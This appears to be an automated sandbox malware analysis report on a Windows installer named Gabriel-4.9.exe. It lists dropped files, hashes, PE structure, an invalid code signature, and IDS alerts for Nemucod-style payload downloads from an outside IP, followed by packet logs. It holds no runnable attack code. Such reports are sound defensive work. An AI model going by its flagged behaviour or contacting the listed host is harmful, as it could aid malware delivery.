SSDEEP:	48:o9YMAuERADl78E1g3e2OHBTTxE4+NaEIT9paYvo6su:gh7EQVXgt+NYgTnw6X
MD5:	3220A6AEFB4FC719CC8849F060859169
SHA1:	85F624DEBCEFD45FDFDF559AC2510A7D1501B412
SHA-256:	988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
SHA-512:	5C45EA8F64B3CDFB262C642BD36B08C822427150D28977AF33C9021A6316B6EFED83F3172C16343FD703D351AF3966B06926E5B33630D51B723709712689881D
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......?...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...T.)..{-.I.U..i..P.U....)..J..9..A@.(Lu..k...5R.T......}..E&..$.O.P}..@>.}..L....,.....t......c...ar.Z\.....R...7 .....z......k.OS.Q.'....r..?...4.x...P.G..y....L.........\|....;z.a.4......SL...S.!.d+.3.....w..)..i.....{.......Hi....)._.~..q/..Ji..v@<.....ne......j..q..Q.C..}G.L".5I!]........._E..")..*..1.....SM...qj...j1.+...n..M:..C..j.H.....;...N..

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPG

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS2 Windows, datetime=2008:07:08 14:20:15], baseline, precision 8, 166x312, components 3
Category:	dropped
Size (bytes):	29054
Entropy (8bit):	5.195708227193176
Encrypted:	false
SSDEEP:	384:wjV66AV66RU53DaYNg7y5fJ+dwd7L/dSivXHk4eo:wjs6As6R4aYyCfToi7R
MD5:	AC40DED6736E08664F2D86A65C47EF60
SHA1:	C352715BBF5AE6C93EEB30DF2C01B6F44FAEDAAA
SHA-256:	F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
SHA-512:	2FBD1C6190743EA9EF86F4CB805508BD5FFE05579519AFAFB55535D27F04F73AA7C980875818778B1178F8B0F7C6F5615FBF250B78E528903950499BBE78AC32
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS2 Windows.2008:07:08 14:20:15........................................8...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................U.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...J....X.Z..l.i.........jl....p............\\.I<...=..v.....(..A.%.P.'!."UI.I....z.u...wq..*..hc4kt.6R.7H.Z.[.#O..O

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	data
Category:	dropped
Size (bytes):	160825
Entropy (8bit):	5.9784583210372215
Encrypted:	false
SSDEEP:	3072:7AW0HGl6b15OHTuZZcwbMy1IrZ4+ofXXkkP:70uYfXUY
MD5:	5441EAEC8AC4B6BD62FC8E8182F86483
SHA1:	8269BB7887E2DA7FB16AB9CCABB3B1FBDC44C813
SHA-256:	A271066F9497D01F0E2B669D7519684057C9445DC28931D7CB2A178DE5A083EE
SHA-512:	D96BAE6E219976CA8CF2F0874AF8037A1FE34EC60F9F22DE2D5E8793923A584D6389C2B11C0BA193E063DE50B4BEDEBCCFD2B5219C941B3C0C1B41B5392F87CE
Malicious:	false
Reputation:	unknown
Preview:	........CGlobalIncludeLuaFile.........Constant Definitions..XMB_OK=0;..MB_OKCANCEL=1;..MB_ABORTRETRYIGNORE=2;..MB_YESNOCANCEL=3;..MB_YESNO=4;..MB_RETRYCANCEL=5;..MB_ICONNONE=0;..MB_ICONSTOP=16;..MB_ICONQUESTION=32;..MB_ICONEXCLAMATION=48;..MB_ICONINFORMATION=64;..MB_DEFBUTTON1=0;..MB_DEFBUTTON2=256;..MB_DEFBUTTON3=512;..IDOK=1;..IDCANCEL=2;..IDABORT=3;..IDIGNORE=5;..IDRETRY=4;..IDYES=6;..IDNO=7;..SW_HIDE=0;..SW_SHOWNORMAL=1;..SW_NORMAL=1;..SW_MAXIMIZE=3;..SW_MINIMIZE=6;..HKEY_CLASSES_ROOT=0;..HKEY_CURRENT_CONFIG=1;..HKEY_CURRENT_USER=2;..HKEY_LOCAL_MACHINE=3;..HKEY_USERS=4;..REG_NONE=0;..REG_SZ=1;..REG_EXPAND_SZ=2;..REG_BINARY=3;..REG_DWORD=4;..REG_DWORD_LITTLE_ENDIAN=4;..REG_DWORD_BIG_ENDIAN=5;..REG_LINK=6;..REG_MULTI_SZ=7;..REG_RESOURCE_LIST=8;..REG_FULL_RESOURCE_DESCRIPTOR=9;..REG_RESOURCE_REQUIREMENTS_LIST=10;..DLL_CALL_CDECL=0;..DLL_CALL_STDCALL=1;..DLL_RETURN_TYPE_INTEGER=0;..DLL_RETURN_TYPE_LONG=1;..DLL_RETURN_TYPE_STRING=2;..SUBMITWEB_POST=0;..SUBMITWEB_GET=1;..ACCESS_READ=1310

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Download File

Process:	C:\Users\user\Desktop\Gabriel-4.9.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5153280
Entropy (8bit):	6.264110671248182
Encrypted:	false
SSDEEP:	49152:aYjdIw1TJyn5PPXDFFCMvSn/yRe4AloH1/coSNs5QKvbeGktKpGw+BbwPiBqkd96:SPZYxnMe4V/cJtKpGvJc5twG
MD5:	2A7D5F8D3FB4AB753B226FD88D31453B
SHA1:	2BA2F1E7D4C5FF02A730920F0796CEE9B174820C
SHA-256:	879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
SHA-512:	FA520EBF9E2626008F479C6E8F472514980D105F917C48AD638A64177D77C82A651C34ED3F28F3E39E67F12E50920503B66E373B5E92CF606BC81DC62A6B3EA4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5.....X.)......2......6......d/.........`...../..............".........4....d..+....d.......d+......d,.....Rich....................PE..d...3..O..........".......5...........%........@..............................P.....DAO...@.................................................H:H......pN.......K.\|H...........0O..,....................................................5.....87H.@....................text....5.......5................. ..`.rdata..*.....5.......5.............@..@.data.........H......vH.............@....pdata..\|H....K..J...~I.............@..@text....."....M..$....K.............@.. data.....K... N..L....K.............@..@.rsrc........pN......8L.............@..@.reloc.......0O.......L.............@..B........................................................................................................................................

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Download File

Process:	C:\Users\user\Desktop\Gabriel-4.9.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	337224
Entropy (8bit):	6.4846248169411185
Encrypted:	false
SSDEEP:	6144:J8bKN/3dhtovc2LAmB7jQaHU9ZW5NpFaQIuHmc6/nEPn:JqKN/NhKEIzdjQaHUe7OaME
MD5:	958103E55C74427E5C66D7E18F3BF237
SHA1:	CEA3FC512763DC2BA1CFA9B7CB7A46AE89D9FCD8
SHA-256:	3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
SHA-512:	02ED6E1F24EF8F7F1C0377FA86A3A494B8A4474472AB7001F7902F2F3AFA6CD975DC69FCAB6F5524545A67657ECCCFCD4ED2C95431843E9D50F2FFF4C5178DBE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d...C\..g...d.......m...M...m.n.u...m.x.....m.i.e...m.j.e...Richd...........................PE..d....\mL.........." .........R..............................................p......w...............................................P.......`...(............ ...2......H....`.......................................................................................text...H........................... ..`.rdata..F...........................@..@.data...DA......."..................@....pdata...2... ...4..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\inst.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Reputation:	unknown
Preview:	..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.782790276376878
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Gabriel-4.9.exe
File size:	21'068'715 bytes
MD5:	db868a34edc41156e9aeed55ea44ba97
SHA1:	64eaaf5ecd0116c4d52f5101f16aeee6f212d035
SHA256:	65236234d12a3267d881ed40ab931cca008b93b6a39720cf68dd11cbe1b3865a
SHA512:	f8f2cbe6048cf4bb070511f1e112e69033781c327c662ff694577a19732cfd275beed0bafd3e985b4c26dead99f4c9526eace7ff27a79c1f310869ec475f820c
SSDEEP:	393216:IecgR96USu2VkX3mGZHoRJ3+j8yvn7lbt0lWQ:SVHemGZMkT7lbt0YQ
TLSH:	2D27015666F840E6D0BEC139C9828A4BD2F278450B35CBCF40945AA91F377E24D2EF79
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.V.P.V.P.V.P.M...i.P.M..._.P._..._.P.V.Q.2.P.M...O.P.M...W.P.M...W.P.RichV.P.........PE..d...L..O.........."......b.........

File Icon


Icon Hash:	e0f0e4e0e4f0f44d

Static PE Info

General

Entrypoint:	0x140002d1c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x4FDA0E4C [Thu Jun 14 16:16:12 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	357b59ff56f808887438b8bd8ad0eaa6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	25/04/2023 23:04:42 25/04/2026 23:04:42
Subject Chain	CN="Beijing Qihu Technology Co., Ltd.", O="Beijing Qihu Technology Co., Ltd.", STREET=\u671d\u9633\u533a\u9152\u4ed9\u6865\u8def6\u53f7\u96622\u53f7\u697c1\u81f319\u5c42104\u53f7\u51858\u5c42801, L=Beijing, S=Beijing, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=Beijing, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=911101026662879416, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	ED6447027944D8993775AB533294460C
Thumbprint SHA-1:	7913DE9D7ED4EEEE790FF0680A4C802C1BC832AB
Thumbprint SHA-256:	24E8DD56E4359351EEF5C22D201FFB991E923343D8DB03398C6DE05656F7EF4C
Serial:	295BF86E852653403313837B

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FC8E10034E0h
dec eax
add esp, 28h
jmp 00007FC8E1001337h
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
dec eax
mov dword ptr [esp+18h], edi
inc ecx
push esp
dec eax
sub esp, 20h
dec esp
lea esp, dword ptr [00009324h]
xor esi, esi
xor ebx, ebx
dec ecx
mov edi, esp
cmp dword ptr [edi+08h], 01h
jne 00007FC8E1001508h
dec eax
arpl si, ax
mov edx, 00000FA0h
inc esi
dec eax
lea ecx, dword ptr [eax+eax*4]
dec eax
lea eax, dword ptr [0000A232h]
dec eax
lea ecx, dword ptr [eax+ecx*8]
dec eax
mov dword ptr [edi], ecx
call dword ptr [000053FDh]
test eax, eax
je 00007FC8E1001508h
inc ebx
dec eax
add edi, 10h
cmp ebx, 24h
jl 00007FC8E10014ABh
mov eax, 00000001h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
mov edi, dword ptr [esp+40h]
dec eax
add esp, 20h
inc ecx
pop esp
ret
dec eax
arpl bx, ax
dec eax
add eax, eax
dec ecx
and dword ptr [esp+eax*8], 00000000h
xor eax, eax
jmp 00007FC8E10014BDh
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 20h
mov edi, 00000024h
dec eax
lea ebx, dword ptr [0000929Ch]
mov esi, edi
dec eax
mov ebp, dword ptr [ebx]
dec eax
test ebp, ebp
je 00007FC8E10014FDh
cmp dword ptr [ebx+08h], 01h
je 00007FC8E10014F7h

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaf7c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x84e3	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xf000	0x5d0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1415263	0x2948
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x19000	0x22c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x61d3	0x6200	46565b91f365f59e95911f623cd509ca	False	0.5916374362244898	data	6.245804251873142	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x3948	0x3a00	9a2a098011201debfdbe2790cfc39397	False	0.3455010775862069	dBase III DBT, version number 0, next free block index 46396, 1st item "j\267"	4.71737238820107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x2200	0x1000	ffa6e0e76a954e6a3fd657281ecc2607	False	0.1767578125	data	2.232690021204779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xf000	0x5d0	0x600	b0c923173cdcf0b82f939c3fafc6e4d7	False	0.4954427083333333	data	4.252873747775349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x84e3	0x8600	31d59b7cd09062539a3b422b998fbb31	False	0.5921758395522388	data	6.518890743409821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x19000	0x3de	0x400	3e80cb8268adc697616a87179e434ae9	False	0.3896484375	data	3.553072991109634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x102e0	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.4772727272727273
RT_BITMAP	0x10414	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768			0.10024752475247525
RT_ICON	0x1073c	0x3a48	Device independent bitmap graphic, 60 x 120 x 32, image size 14880			0.539745308310992
RT_ICON	0x14184	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.7267634854771784
RT_ICON	0x1672c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.7851782363977486
RT_ICON	0x177d4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.8439716312056738
RT_RCDATA	0x17c3c	0x80	ISO-8859 text, with no line terminators	English	United States	0.09375
RT_GROUP_CURSOR	0x17cbc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_ICON	0x17cd0	0x3e	data			0.8225806451612904
RT_VERSION	0x17d10	0x300	data	Chinese	China	0.4986979166666667
RT_MANIFEST	0x18010	0x4d3	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.47692307692307695

Imports

DLL	Import
KERNEL32.dll	_lclose, GetModuleFileNameA, _lread, _llseek, _lopen, _lwrite, _lcreat, CreateDirectoryA, SetCurrentDirectoryA, lstrcatA, FreeLibrary, GetProcAddress, LoadLibraryA, GetDiskFreeSpaceA, GetFileAttributesA, RemoveDirectoryA, DeleteFileA, lstrlenA, GetCurrentDirectoryA, CloseHandle, GetExitCodeProcess, GetLastError, LocalFree, GetCurrentProcess, MoveFileExA, Sleep, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapReAlloc, HeapSize, IsValidCodePage, lstrcpyA, GetTempPathA, CompareStringA, GetOEMCP, GetACP, GetModuleHandleW, ExitProcess, DecodePointer, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, EncodePointer, LoadLibraryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, TerminateProcess, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, RtlUnwindEx, WriteFile, GetStdHandle, GetModuleFileNameW, HeapSetInformation, GetVersion, HeapCreate, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo
USER32.dll	TranslateMessage, DispatchMessageA, PeekMessageA, wsprintfA, LoadCursorA, SetCursor, MessageBoxA, MsgWaitForMultipleObjects
ADVAPI32.dll	GetTokenInformation, OpenProcessToken
SHELL32.dll	ShellExecuteExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T04:24:22.186420+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49722	172.67.165.100	443	TCP
2024-12-29T04:24:22.483722+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	172.67.165.100	443	192.168.2.6	49722	TCP
2024-12-29T04:24:28.111567+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49740	172.67.165.100	80	TCP
2024-12-29T04:24:29.774416+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49746	172.67.165.100	443	TCP
2024-12-29T04:24:30.042298+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	172.67.165.100	443	192.168.2.6	49746	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 04:24:19.990963936 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:19.991023064 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:19.991269112 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:20.002847910 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:20.002873898 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:21.264410973 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:21.264497042 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:21.304413080 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:21.304436922 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:21.304697990 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:21.304753065 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:21.306256056 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:21.347335100 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.186408997 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.186463118 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.186469078 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.186485052 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.186502934 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.186541080 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.186544895 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.186588049 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.194698095 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.194755077 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.194804907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.194848061 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.203113079 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.203166962 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.203185081 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.203227997 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.211462021 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.211517096 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.305706978 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.305771112 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.305789948 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.305864096 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.309815884 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.309868097 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.404706001 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.404769897 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.408400059 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.408452034 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.408458948 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.408508062 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.414004087 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.414058924 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.421785116 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.421843052 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.421849966 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.421895027 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.421904087 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.421945095 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.429516077 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.429574966 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.437290907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.437346935 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.437446117 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.437491894 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.445111036 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.445161104 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.445210934 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.445260048 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.451546907 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.451602936 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.451623917 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.451754093 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.457940102 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.457993984 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.458035946 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.458077908 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.464409113 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.464456081 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.464510918 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.464554071 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.470828056 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.470890045 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.477288008 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.477346897 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.477355003 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.477394104 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.483757019 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.483808041 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.483813047 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.483973980 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.626930952 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.627005100 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.630074024 CET	443	49722	172.67.165.100	192.168.2.6
Dec 29, 2024 04:24:22.630129099 CET	49722	443	192.168.2.6	172.67.165.100
Dec 29, 2024 04:24:22.630140066 CET	443	49722	172.67.165.100	192.168.2.6
